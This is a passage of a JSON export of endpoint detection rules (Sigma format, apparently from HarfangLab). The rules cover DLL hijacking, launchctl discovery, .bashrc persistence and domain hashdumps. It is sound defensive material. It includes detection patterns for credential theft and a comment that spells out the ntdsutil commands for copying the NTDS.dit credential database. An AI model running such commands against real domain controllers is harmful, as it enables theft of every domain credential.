"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_rasautou.yml",
"content": "title: DLL Hijacking via rasautou.exe\nid: a3fc0e1e-cea6-465f-92f2-df8319888e07\ndescription: |\n Detects potential Windows DLL Hijacking via rasautou.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'rasautou.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\MPRAPI.dll'\n - '\\rasdlg.dll'\n - '\\rasman.dll'\n - '\\rtutils.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a3fc0e1e-cea6-465f-92f2-df8319888e07",
"rule_name": "DLL Hijacking via rasautou.exe",
"rule_description": "Detects potential Windows DLL Hijacking via rasautou.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a41b4e95-63d6-4018-bcbe-eb7cd37af7d5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617947Z",
"creation_date": "2026-03-23T11:45:34.617949Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617953Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1007/",
"https://attack.mitre.org/techniques/T1569/001/"
],
"name": "t1007_launchctl_list.yml",
"content": "title: System Services Discovered via Launchctl\nid: a41b4e95-63d6-4018-bcbe-eb7cd37af7d5\ndescription: |\n Detects the usage of launchctl to list the installed launch daemons/agents.\n An attacker could list the installed launch daemons/agents to look for vulnerable daemons, or list defensive tools installed on the infected host.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://attack.mitre.org/techniques/T1007/\n - https://attack.mitre.org/techniques/T1569/001/\ndate: 2022/11/09\nmodified: 2025/10/13\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1007\n - attack.t1569.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Launchctl\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/bin/launchctl'\n CommandLine:\n - 'launchctl list'\n - '/bin/launchctl list'\n # Filter-out missing parents\n ParentImage|contains: '?'\n GrandparentImage|contains: '?'\n\n exclusion_parentimage:\n ParentImage:\n - '/usr/bin/sysdiagnose'\n - '/usr/libexec/sysdiagnosed'\n - '/usr/local/bin/ctrld'\n - '/Applications/*.app/Contents/*'\n - '/Applications/GLPI-Agent/bin/perl'\n - '/Applications/NinjaRMMAgent/programfiles/ninjarmm-macagent'\n - '/Applications/NinjaRemote/ncstreamer.app/Contents/MacOS/ncstreamer'\n - '/Library/Application Support/*'\n - '/Library/Bitdefender/AVP/product/bin/BDUpgDaemon'\n - '/Library/WithSecure/bin/wsswupd.xpc/Contents/MacOS/wsswupd'\n - '/Users/*/Visual Studio Code.app/Contents/Resources/app/bin/code-tunnel'\n - '/Users/*/Applications/zoom.us.app/Contents/Library/LaunchAgents/ZoomUpdater.app/Contents/MacOS/ZoomUpdater'\n - '/private/var/folders/*/Visual Studio Code*.app/Contents/Resources/app/bin/code-tunnel'\n - '/opt/fusioninventory-agent/bin/perl'\n - '/opt/homebrew/Library/Homebrew/vendor/portable-ruby/*/bin/ruby'\n - 
'/usr/local/Homebrew/Library/Homebrew/vendor/portable-ruby/*/bin/ruby'\n - '/usr/local/munki/Python.framework/Versions/*/Resources/Python.app/Contents/MacOS/Python'\n\n exclusion_grandparentimage:\n GrandparentImage:\n - '/Applications/*.app/Contents/*'\n - '/Applications/GLPI-Agent/bin/perl'\n - '/Applications/NinjaRMMAgent/programfiles/ninjarmm-macagent'\n - '/Applications/Utilities/Adobe Creative Cloud/Utils/AdobeGenuineValidator'\n - '/Applications/GLPI-Agent/bin/perl /Applications/GLPI-Agent/bin/glpi-agent'\n - '/Library/Application Support/*'\n - '/Library/ManageEngine/UEMS_Agent/bin/dcpatchscan'\n - '/opt/homebrew/Library/Homebrew/vendor/portable-ruby/*/bin/ruby'\n - '/usr/local/Homebrew/Library/Homebrew/vendor/portable-ruby/*/bin/ruby'\n - '/System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/XPCServices/package_script_service.xpc/Contents/MacOS/package_script_service'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '|/Applications/*.app/Contents/'\n - '|/Applications/Utilities/Adobe Creative Cloud/Utils/AdobeGenuineValidator|'\n\n exclusion_installer:\n GrandparentCommandLine|startswith:\n - '/bin/bash /tmp/PKInstallSandbox'\n - '/bin/bash /Library/InstallerSandboxes/'\n - '/bin/sh /tmp/PKInstallSandbox.??????/Scripts/'\n - '/bin/zsh /tmp/PKInstallSandbox.??????/Scripts/'\n - '/bin/bash -x /tmp/PKInstallSandbox.??????/Scripts/'\n\n exclusion_logi:\n CommandLine|startswith: '/bin/launchctl list com.logi.optionsplus.updater'\n\n exclusion_avast:\n CommandLine: '/bin/launchctl list com.avast.service'\n GrandparentCommandLine: '/bin/bash /Applications/Avast.app/Contents/Backend/scripts/update/update.sh'\n\n exclusion_globalprotect:\n GrandparentCommandLine:\n - 'sh -c sudo /bin/launchctl list | /usr/bin/grep palo | /usr/bin/grep -v grep >> /Library/Logs/PaloAltoNetworks/GlobalProtect/sysext.service.log'\n - 'sh -c sudo /bin/launchctl list | /usr/bin/grep NetworkExtension.com.paloaltonetworks.GlobalProtect.client.extension > /dev/null 2>&1'\n\n 
exclusion_wazuh:\n Ancestors|contains: '/Library/Ossec/bin/wazuh-syscheckd'\n\n exclusion_amazon:\n ParentCommandLine: '/bin/bash /usr/local/libexec/amazon-ena-ethernet'\n\n exclusion_ardagent:\n ProcessGrandparentCommandLine|contains: '/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart'\n\n exclusion_jamf:\n - ProcessAncestors|contains: '/usr/local/jamf/bin/jamf'\n - ProcessParentCommandLine|contains: '/Library/Application Support/JAMF/tmp/'\n\n exclusion_sekoia:\n ProcessParentImage: '/sbin/launchd'\n ProcessCommandLine: 'launchctl list SEKOIAEndpointAgentWatchdog'\n\n exclusion_mcafee:\n ProcessCommandLine: 'sh -c launchctl list | grep com.mcafee.virusscan.fmpcd'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a41b4e95-63d6-4018-bcbe-eb7cd37af7d5",
"rule_name": "System Services Discovered via Launchctl",
"rule_description": "Detects the usage of launchctl to list the installed launch daemons/agents.\nAn attacker could list the installed launch daemons/agents to look for vulnerable daemons, or list defensive tools installed on the infected host.\nIt is recommended to investigate the parent process for suspicious activities.\n",
"rule_creation_date": "2022-11-09",
"rule_modified_date": "2025-10-13",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1007",
"attack.t1569.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a431b083-8f5e-44d4-96c1-a3f0fe917ce6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096688Z",
"creation_date": "2026-03-23T11:45:34.096690Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096695Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_gup.yml",
"content": "title: DLL Hijacking via GUP.exe\nid: a431b083-8f5e-44d4-96c1-a3f0fe917ce6\ndescription: |\n Detects potential Windows DLL Hijacking via GUP.exe (Notepad++ updater).\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/12/22\nmodified: 2025/08/25\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'gup.exe'\n ProcessSignature: 'Notepad++'\n ImageLoaded|endswith: '\\libcurl.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Notepad++\\updater\\'\n - '?:\\Program Files\\Notepad++\\updater\\'\n - '*\\AppData\\Local\\Notepad++\\updater\\'\n - '*\\AppData\\Roaming\\Notepad++\\updater\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files (x86)\\Notepad++\\updater\\'\n - '?:\\Program Files\\Notepad++\\updater\\'\n - '*\\AppData\\Local\\Notepad++\\updater\\'\n - '*\\AppData\\Roaming\\Notepad++\\updater\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 
'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n - 'Notepad++'\n\n exclusion_not_signed:\n sha256:\n - '9aa9fb6fa9414ab45bb0d4f1b1be2f401f0d0febcae434f99f8aa6febdd5a53e'\n - 'd9dea11f8e63fabdd33c3935fd0ab5440c066591f34e4c1b334a94f5cd47794b'\n - '5d6104def81177cad393733cd51738855ec492a8c809ca82140f262cb5376e19'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a431b083-8f5e-44d4-96c1-a3f0fe917ce6",
"rule_name": "DLL Hijacking via GUP.exe",
"rule_description": "Detects potential Windows DLL Hijacking via GUP.exe (Notepad++ updater).\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-12-22",
"rule_modified_date": "2025-08-25",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a478cd0a-d389-4c46-ab37-3ae588517a6a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075666Z",
"creation_date": "2026-03-23T11:45:34.075668Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075672Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.sentinelone.com/labs/sandman-apt-a-mystery-group-targeting-telcos-with-a-luajit-toolkit/",
"https://attack.mitre.org/techniques/T1574/001/",
"https://attack.mitre.org/techniques/T1574/002/"
],
"name": "t1574_001_persistence_dll_hijack_spooler_ualapi.yml",
"content": "title: Print Spooler Service DLL Hijack Detected\nid: a478cd0a-d389-4c46-ab37-3ae588517a6a\ndescription: |\n Detects the execution of a DLL hijack of the Windows Print Spooler service trying to load the non-existent ualapi.dll DLL from system32 directory.\n Attackers may install a malicious DLL in the Windows folder for persistence purposes.\n It is recommended to verify the legitimacy of the loaded DLL and to look for other suspicious behavior.\nreferences:\n - https://www.sentinelone.com/labs/sandman-apt-a-mystery-group-targeting-telcos-with-a-luajit-toolkit/\n - https://attack.mitre.org/techniques/T1574/001/\n - https://attack.mitre.org/techniques/T1574/002/\ndate: 2023/09/22\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.defense_evasion\n - attack.t1574.001\n - attack.t1574.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.DLLHijacking\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|endswith: '\\ualapi.dll'\n Image|endswith: '\\spoolsv.exe'\n\n exclusion_signed:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a478cd0a-d389-4c46-ab37-3ae588517a6a",
"rule_name": "Print Spooler Service DLL Hijack Detected",
"rule_description": "Detects the execution of a DLL hijack of the Windows Print Spooler service trying to load the non-existent ualapi.dll library from the System32 directory.\nAttackers may install a malicious DLL in the Windows folder for persistence purposes.\nIt is recommended to verify the legitimacy of the loaded DLL and to look for other suspicious behavior.\n",
"rule_creation_date": "2023-09-22",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1574.001",
"attack.t1574.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a479f46f-ac6c-4a4e-ae31-8fcb6a1eb4ea",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 1,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.635247Z",
"creation_date": "2026-03-23T11:45:34.596641Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.596648Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat",
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md#atomic-test-2---add-command-to-bashrc",
"https://attack.mitre.org/techniques/T1546/004/"
],
"name": "t1546_004_bashrc_modified_linux.yml",
"content": "title: Suspicious Modification of .bashrc\nid: a479f46f-ac6c-4a4e-ae31-8fcb6a1eb4ea\ndescription: |\n Detects an attempt to modify the .bashrc file, a script file executed when a user logs in.\n Adversaries can use this file to perform various malicious tasks like establish persistence or disable the shell history file.\n It is recommended to investigate the new content of the .bashrc file as well as the execution context to determine the legitimacy of this action.\nreferences:\n - https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md#atomic-test-2---add-command-to-bashrc\n - https://attack.mitre.org/techniques/T1546/004/\ndate: 2023/01/03\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1546.004\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.ConfigChange\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection_write:\n Kind: 'access'\n Permissions: 'write'\n Path:\n - '/root/.bashrc'\n - '/home/*/.bashrc'\n - '/etc/bash.bashrc'\n\n selection_misc:\n Kind:\n - 'rename'\n - 'symlink'\n - 'hardlink'\n TargetPath:\n - '/root/.bashrc'\n - '/home/*/.bashrc'\n - '/etc/bash.bashrc'\n\n exclusion_image:\n ProcessImage:\n - '/usr/sbin/userdel'\n - '/usr/sbin/mkhomedir_helper'\n - '/usr/libexec/oddjob/mkhomedir'\n - '/usr/bin/podman'\n - '/opt/yocto/*'\n - '/kaniko/executor'\n - '/bin/sed'\n - '/usr/bin/sed'\n - '/usr/sbin/luseradd'\n - '/usr/bin/tar'\n - '/usr/bin/install'\n - '/usr/bin/dpkg'\n - '/usr/bin/rsync'\n\n exclusion_ancestors:\n ProcessAncestors|contains:\n - '|/usr/sbin/cron|'\n - '|/usr/sbin/crond|'\n - '|/opt/bladelogic/*/NSH/sbin/bldeploy|'\n\n exclusion_useradd:\n - ProcessImage: '/usr/sbin/useradd'\n - ProcessCommandLine: '/usr/bin/perl /usr/sbin/adduser *'\n\n 
exclusion_docker:\n - ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/local/bin/dockerd'\n - '/usr/bin/dockerd-ce'\n - '/usr/sbin/dockerd-ce'\n - '/snap/docker/*/bin/dockerd'\n - ProcessAncestors|contains:\n - '|/usr/bin/dockerd|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n\n exclusion_containerd:\n - ProcessImage:\n - '/usr/bin/containerd'\n - '/usr/sbin/containerd'\n - ProcessGrandparentImage:\n - '/usr/bin/containerd-shim-runc-v2'\n - '/snap/docker/*/bin/containerd-shim-runc-v2'\n\n exclusion_rootlesskit:\n # /home//bin/rootlesskit --state-dir=/run/user/1022/dockerd-rootless --net=slirp4netns --mtu=65520 --slirp4netns-sandbox=auto --slirp4netns-seccomp=auto --disable-host-loopback --port-driver=builtin --copy-up=/etc --copy-up=/run --propagation=rslave /home//bin/dockerd-rootless.sh\n - ProcessImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n - ProcessParentImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n\n exclusion_k3s:\n ProcessImage: '/bin/containerd'\n ProcessParentCommandLine: '/bin/k3s server'\n\n exclusion_buildah:\n ProcessCommandLine|startswith: 'storage-untar / /'\n\n exclusion_yum:\n ProcessCommandLine: '/usr/bin/python /usr/bin/yum -y update'\n\n exclusion_puppet:\n - ProcessParentImage: '/opt/puppetlabs/puppet/bin/ruby'\n - ProcessGrandparentImage: '/opt/puppetlabs/puppet/bin/ruby'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n 
- '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_ansible_current_directory:\n ProcessImage:\n - '/usr/bin/python?.?'\n - '/usr/libexec/platform-python?.?'\n ProcessCurrentDirectory: '/root/.ansible/tmp/'\n\n exclusion_rke2_containerd:\n ProcessImage: '/var/lib/rancher/rke2/data/*/bin/containerd'\n ProcessParentImage: '/usr/local/bin/rke2'\n\n # Not to be confused with Burp Suite\n # https://burp.grke.org/+\n exclusion_burp:\n ProcessImage: '/usr/sbin/burp'\n\n exclusion_code:\n ProcessCommandLine: '/usr/share/code/code --unity-launch'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a479f46f-ac6c-4a4e-ae31-8fcb6a1eb4ea",
"rule_name": "Suspicious Modification of .bashrc",
"rule_description": "Detects an attempt to modify the .bashrc file, a script file executed when a user logs in.\nAdversaries can use this file to perform various malicious tasks such as establishing persistence or disabling the shell history file.\nIt is recommended to investigate the new content of the .bashrc file as well as the execution context to determine the legitimacy of this action.\n",
"rule_creation_date": "2023-01-03",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1546.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a4a54343-dc8c-40e5-9a8c-18385699b85c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075359Z",
"creation_date": "2026-03-23T11:45:34.075361Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075365Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/rapid7/metasploit-framework/blob/2382d7530cf0cf2aa4ac63be30c98ca3fcdd6bbf/modules/post/windows/gather/credentials/domain_hashdump.rb",
"https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc753343(v=ws.11)"
],
"name": "t1003_003_ntdsutil_domain_hashdump.yml",
"content": "title: Domain Hashdump Detected\nid: a4a54343-dc8c-40e5-9a8c-18385699b85c\ndescription: |\n Detects the dumping of the NTDS.dit file on a live Domain Controller to extract all user credentials.\n Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights.\n It is recommended to determine if this dump is part of a regular backup mecanism, and if not the case, to immediately take remediative actions to cut the attackers' access to the domain controller.\nreferences:\n - https://github.com/rapid7/metasploit-framework/blob/2382d7530cf0cf2aa4ac63be30c98ca3fcdd6bbf/modules/post/windows/gather/credentials/domain_hashdump.rb\n - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc753343(v=ws.11)\ndate: 2020/11/05\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.003\n - attack.t1078\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Ntdsutil\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # ntdsutil \"ac in ntds\" \"ifm\" \"cr fu C:\\Perflogs\\1\"\n # ntdsutil \"activate instance ntds\" \"ifm\" \"Create Full C:\\Perflogs\\1\" \"quit quit\"\n selection_ntdsutil:\n Image|endswith: '\\ntdsutil.exe'\n\n selection_ifm:\n CommandLine:\n - '*ifm*'\n - ' *i* '\n\n selection_activate_instance_ntds:\n CommandLine|contains:\n - '*activate *instance *ntds*'\n - '*ac *i*'\n\n selection_create_full:\n CommandLine:\n - '*Create *Full*'\n - '*cr *fu*'\n\n exclusion_isars:\n CommandLine|re: 'ntdsutil\\.exe activate instance ntds ifm Create Full C:\\\\[a-zA-Z-0-9]{11} quit quit'\n User|contains: 'isars'\n\n exclusion_alticap:\n CommandLine: 
'?:\\Windows\\system32\\ntdsutil.exe activate instance ntds ifm create full ?:\\ProgramData\\Alticap\\ActiveDirectory\\NTDSbackup\\ADBackupFull#????-??-??T??-??-??.bak quit quit'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a4a54343-dc8c-40e5-9a8c-18385699b85c",
"rule_name": "Domain Hashdump Detected",
